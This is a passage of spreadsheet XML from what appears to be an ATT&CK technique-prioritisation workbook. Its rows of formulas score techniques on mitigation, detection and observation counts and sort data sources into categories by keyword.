        <v>175</v>
      </c>
      <c r="AM179" s="37" t="str" cm="1">
        <f t="array" ref="AM179">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD179)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN179" s="37">
        <v>0</v>
      </c>
      <c r="AO179" s="37"/>
      <c r="AP179" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ179" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>23.366666666666671</v>
      </c>
      <c r="AR179" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS179" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT179" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU17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80" spans="1:47" ht="17">
      <c r="A180" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B180" s="37">
        <f t="shared" si="2"/>
        <v>70.5</v>
      </c>
      <c r="C180" s="37" t="s">
        <v>3789</v>
      </c>
      <c r="D180" s="50" t="s">
        <v>629</v>
      </c>
      <c r="E180" s="37" t="s">
        <v>3790</v>
      </c>
      <c r="F180" s="37">
        <v>1</v>
      </c>
      <c r="G180" s="37">
        <v>1</v>
      </c>
      <c r="H180" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I180" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J180" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K180" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L180" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M180" s="37">
        <v>0</v>
      </c>
      <c r="N180" s="56">
        <v>0</v>
      </c>
      <c r="O180" s="56">
        <v>0</v>
      </c>
      <c r="P180" s="56">
        <v>0</v>
      </c>
      <c r="Q180" s="56">
        <v>0</v>
      </c>
      <c r="R180" s="57"/>
      <c r="S180" s="57"/>
      <c r="T180" s="57"/>
      <c r="U180" s="57"/>
      <c r="V180" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W180" s="37"/>
      <c r="X180" s="37"/>
      <c r="Y180" s="37"/>
      <c r="Z180" s="37"/>
      <c r="AA180" s="37"/>
      <c r="AB180" s="37"/>
      <c r="AC180" s="37"/>
      <c r="AD180" s="50" t="s">
        <v>646</v>
      </c>
      <c r="AE180" s="37" t="str" cm="1">
        <f t="array" ref="AE180">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD180)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF180" s="37">
        <v>176</v>
      </c>
      <c r="AG180" s="37" t="str" cm="1">
        <f t="array" ref="AG180">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD180)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH180" s="37">
        <v>176</v>
      </c>
      <c r="AI180" s="37" t="str" cm="1">
        <f t="array" ref="AI180">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD180)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ180" s="37">
        <v>176</v>
      </c>
      <c r="AK180" s="37" t="str" cm="1">
        <f t="array" ref="AK180">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD180)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL180" s="37">
        <v>176</v>
      </c>
      <c r="AM180" s="37" t="str" cm="1">
        <f t="array" ref="AM180">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD180)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN180" s="37"/>
      <c r="AO180" s="37"/>
      <c r="AP180" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ180" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>23.5</v>
      </c>
      <c r="AR180" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS180" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT180" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU18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81" spans="1:47" ht="51">
      <c r="A181" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B181" s="37">
        <f t="shared" si="2"/>
        <v>381.02379128571425</v>
      </c>
      <c r="C181" s="37" t="s">
        <v>655</v>
      </c>
      <c r="D181" s="50" t="s">
        <v>656</v>
      </c>
      <c r="E181" s="37"/>
      <c r="F181" s="37">
        <v>1</v>
      </c>
      <c r="G181" s="37">
        <v>6</v>
      </c>
      <c r="H181" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.35</v>
      </c>
      <c r="I181" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J181" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K181" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.6</v>
      </c>
      <c r="L181" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.6</v>
      </c>
      <c r="M181" s="37">
        <v>3.5028999999999998E-2</v>
      </c>
      <c r="N181" s="56">
        <v>0</v>
      </c>
      <c r="O181" s="56">
        <v>3</v>
      </c>
      <c r="P181" s="56">
        <v>1</v>
      </c>
      <c r="Q181" s="56">
        <v>2</v>
      </c>
      <c r="R181" s="57" t="s">
        <v>657</v>
      </c>
      <c r="S181" s="57">
        <v>5</v>
      </c>
      <c r="T181" s="57" t="s">
        <v>135</v>
      </c>
      <c r="U181" s="57">
        <v>8</v>
      </c>
      <c r="V181" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.15238114285714285</v>
      </c>
      <c r="W181" s="37">
        <v>13</v>
      </c>
      <c r="X181" s="37">
        <v>0.23636399999999999</v>
      </c>
      <c r="Y181" s="37">
        <v>0.23636399999999999</v>
      </c>
      <c r="Z181" s="37">
        <v>6</v>
      </c>
      <c r="AA181" s="37">
        <v>0.06</v>
      </c>
      <c r="AB181" s="37">
        <v>0.06</v>
      </c>
      <c r="AC181" s="37"/>
      <c r="AD181" s="50" t="s">
        <v>602</v>
      </c>
      <c r="AE181" s="37" t="str" cm="1">
        <f t="array" ref="AE181">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD181)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF181" s="37">
        <v>177</v>
      </c>
      <c r="AG181" s="37" t="str" cm="1">
        <f t="array" ref="AG181">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD181)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH181" s="37">
        <v>177</v>
      </c>
      <c r="AI181" s="37" t="str" cm="1">
        <f t="array" ref="AI181">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD181)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ181" s="37">
        <v>177</v>
      </c>
      <c r="AK181" s="37" t="str" cm="1">
        <f t="array" ref="AK181">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD181)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL181" s="37">
        <v>177</v>
      </c>
      <c r="AM181" s="37" t="str" cm="1">
        <f t="array" ref="AM181">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD181)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN181" s="37">
        <v>0</v>
      </c>
      <c r="AO181" s="37">
        <v>0</v>
      </c>
      <c r="AP181" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ181" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>127.00793042857141</v>
      </c>
      <c r="AR181" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS181" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT181" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU18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82" spans="1:47" ht="34">
      <c r="A182" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B182" s="37">
        <f t="shared" si="2"/>
        <v>169.76204057142857</v>
      </c>
      <c r="C182" s="37" t="s">
        <v>658</v>
      </c>
      <c r="D182" s="50" t="s">
        <v>656</v>
      </c>
      <c r="E182" s="37" t="s">
        <v>659</v>
      </c>
      <c r="F182" s="37">
        <v>1</v>
      </c>
      <c r="G182" s="37">
        <v>1</v>
      </c>
      <c r="H182" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I182" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J182" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K182" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L182" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M182" s="37">
        <v>0</v>
      </c>
      <c r="N182" s="56">
        <v>0</v>
      </c>
      <c r="O182" s="56">
        <v>3</v>
      </c>
      <c r="P182" s="56">
        <v>0</v>
      </c>
      <c r="Q182" s="56">
        <v>0</v>
      </c>
      <c r="R182" s="57" t="s">
        <v>657</v>
      </c>
      <c r="S182" s="57">
        <v>5</v>
      </c>
      <c r="T182" s="57" t="s">
        <v>135</v>
      </c>
      <c r="U182" s="57">
        <v>8</v>
      </c>
      <c r="V182" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.13809542857142856</v>
      </c>
      <c r="W182" s="37">
        <v>13</v>
      </c>
      <c r="X182" s="37">
        <v>0.23636399999999999</v>
      </c>
      <c r="Y182" s="37">
        <v>0.23636399999999999</v>
      </c>
      <c r="Z182" s="37">
        <v>3</v>
      </c>
      <c r="AA182" s="37">
        <v>0.03</v>
      </c>
      <c r="AB182" s="37">
        <v>0.03</v>
      </c>
      <c r="AC182" s="37"/>
      <c r="AD182" s="50" t="s">
        <v>526</v>
      </c>
      <c r="AE182" s="37" t="str" cm="1">
        <f t="array" ref="AE182">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD182)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF182" s="37">
        <v>178</v>
      </c>
      <c r="AG182" s="37" t="str" cm="1">
        <f t="array" ref="AG182">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD182)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH182" s="37">
        <v>178</v>
      </c>
      <c r="AI182" s="37" t="str" cm="1">
        <f t="array" ref="AI182">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD182)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ182" s="37">
        <v>178</v>
      </c>
      <c r="AK182" s="37" t="str" cm="1">
        <f t="array" ref="AK182">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD182)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL182" s="37">
        <v>178</v>
      </c>
      <c r="AM182" s="37" t="str" cm="1">
        <f t="array" ref="AM182">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD182)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN182" s="37">
        <v>0</v>
      </c>
      <c r="AO182" s="37">
        <v>0</v>
      </c>
      <c r="AP182" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ182" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>56.587346857142855</v>
      </c>
      <c r="AR182" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS182" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT182" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU18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83" spans="1:47" ht="51">
      <c r="A183" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B183" s="37">
        <f t="shared" si="2"/>
        <v>167.3001365714286</v>
      </c>
      <c r="C183" s="37" t="s">
        <v>660</v>
      </c>
      <c r="D183" s="50" t="s">
        <v>656</v>
      </c>
      <c r="E183" s="37" t="s">
        <v>661</v>
      </c>
      <c r="F183" s="37">
        <v>1</v>
      </c>
      <c r="G183" s="37">
        <v>1</v>
      </c>
      <c r="H183" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I183" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J183" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K183" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L183" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M183" s="37">
        <v>0</v>
      </c>
      <c r="N183" s="56">
        <v>0</v>
      </c>
      <c r="O183" s="56">
        <v>2</v>
      </c>
      <c r="P183" s="56">
        <v>0</v>
      </c>
      <c r="Q183" s="56">
        <v>0</v>
      </c>
      <c r="R183" s="57" t="s">
        <v>657</v>
      </c>
      <c r="S183" s="57">
        <v>5</v>
      </c>
      <c r="T183" s="57" t="s">
        <v>135</v>
      </c>
      <c r="U183" s="57">
        <v>8</v>
      </c>
      <c r="V183" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.13333352380952382</v>
      </c>
      <c r="W183" s="37">
        <v>13</v>
      </c>
      <c r="X183" s="37">
        <v>0.23636399999999999</v>
      </c>
      <c r="Y183" s="37">
        <v>0.23636399999999999</v>
      </c>
      <c r="Z183" s="37">
        <v>2</v>
      </c>
      <c r="AA183" s="37">
        <v>0.02</v>
      </c>
      <c r="AB183" s="37">
        <v>0.02</v>
      </c>
      <c r="AC183" s="37"/>
      <c r="AD183" s="50" t="s">
        <v>602</v>
      </c>
      <c r="AE183" s="37" t="str" cm="1">
        <f t="array" ref="AE183">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD183)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF183" s="37">
        <v>179</v>
      </c>
      <c r="AG183" s="37" t="str" cm="1">
        <f t="array" ref="AG183">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD183)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH183" s="37">
        <v>179</v>
      </c>
      <c r="AI183" s="37" t="str" cm="1">
        <f t="array" ref="AI183">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD183)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ183" s="37">
        <v>179</v>
      </c>
      <c r="AK183" s="37" t="str" cm="1">
        <f t="array" ref="AK183">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD183)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL183" s="37">
        <v>179</v>
      </c>
      <c r="AM183" s="37" t="str" cm="1">
        <f t="array" ref="AM183">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD183)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN183" s="37">
        <v>0</v>
      </c>
      <c r="AO183" s="37">
        <v>0</v>
      </c>
      <c r="AP183" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ183" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>55.766712190476198</v>
      </c>
      <c r="AR183" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS183" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT183" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU18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84" spans="1:47" ht="51">
      <c r="A184" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B184" s="37">
        <f t="shared" si="2"/>
        <v>168.23347066666668</v>
      </c>
      <c r="C184" s="37" t="s">
        <v>662</v>
      </c>
      <c r="D184" s="50" t="s">
        <v>656</v>
      </c>
      <c r="E184" s="37" t="s">
        <v>663</v>
      </c>
      <c r="F184" s="37">
        <v>1</v>
      </c>
      <c r="G184" s="37">
        <v>1</v>
      </c>
      <c r="H184" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I184" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J184" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K184" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L184" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M184" s="37">
        <v>0</v>
      </c>
      <c r="N184" s="56">
        <v>0</v>
      </c>
      <c r="O184" s="56">
        <v>2</v>
      </c>
      <c r="P184" s="56">
        <v>0</v>
      </c>
      <c r="Q184" s="56">
        <v>0</v>
      </c>
      <c r="R184" s="57" t="s">
        <v>657</v>
      </c>
      <c r="S184" s="57">
        <v>5</v>
      </c>
      <c r="T184" s="57" t="s">
        <v>135</v>
      </c>
      <c r="U184" s="57">
        <v>8</v>
      </c>
      <c r="V184" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.13333352380952382</v>
      </c>
      <c r="W184" s="37">
        <v>13</v>
      </c>
      <c r="X184" s="37">
        <v>0.23636399999999999</v>
      </c>
      <c r="Y184" s="37">
        <v>0.23636399999999999</v>
      </c>
      <c r="Z184" s="37">
        <v>2</v>
      </c>
      <c r="AA184" s="37">
        <v>0.02</v>
      </c>
      <c r="AB184" s="37">
        <v>0.02</v>
      </c>
      <c r="AC184" s="37"/>
      <c r="AD184" s="50" t="s">
        <v>602</v>
      </c>
      <c r="AE184" s="37" t="str" cm="1">
        <f t="array" ref="AE184">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD184)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF184" s="37">
        <v>180</v>
      </c>
      <c r="AG184" s="37" t="str" cm="1">
        <f t="array" ref="AG184">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD184)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH184" s="37">
        <v>180</v>
      </c>
      <c r="AI184" s="37" t="str" cm="1">
        <f t="array" ref="AI184">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD184)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ184" s="37">
        <v>180</v>
      </c>
      <c r="AK184" s="37" t="str" cm="1">
        <f t="array" ref="AK184">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD184)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL184" s="37">
        <v>180</v>
      </c>
      <c r="AM184" s="37" t="str" cm="1">
        <f t="array" ref="AM184">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD184)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN184" s="37">
        <v>0</v>
      </c>
      <c r="AO184" s="37">
        <v>0</v>
      </c>
      <c r="AP184" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ184" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>56.077823555555561</v>
      </c>
      <c r="AR184" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS184" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT184" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU18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85" spans="1:47" ht="34">
      <c r="A185" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
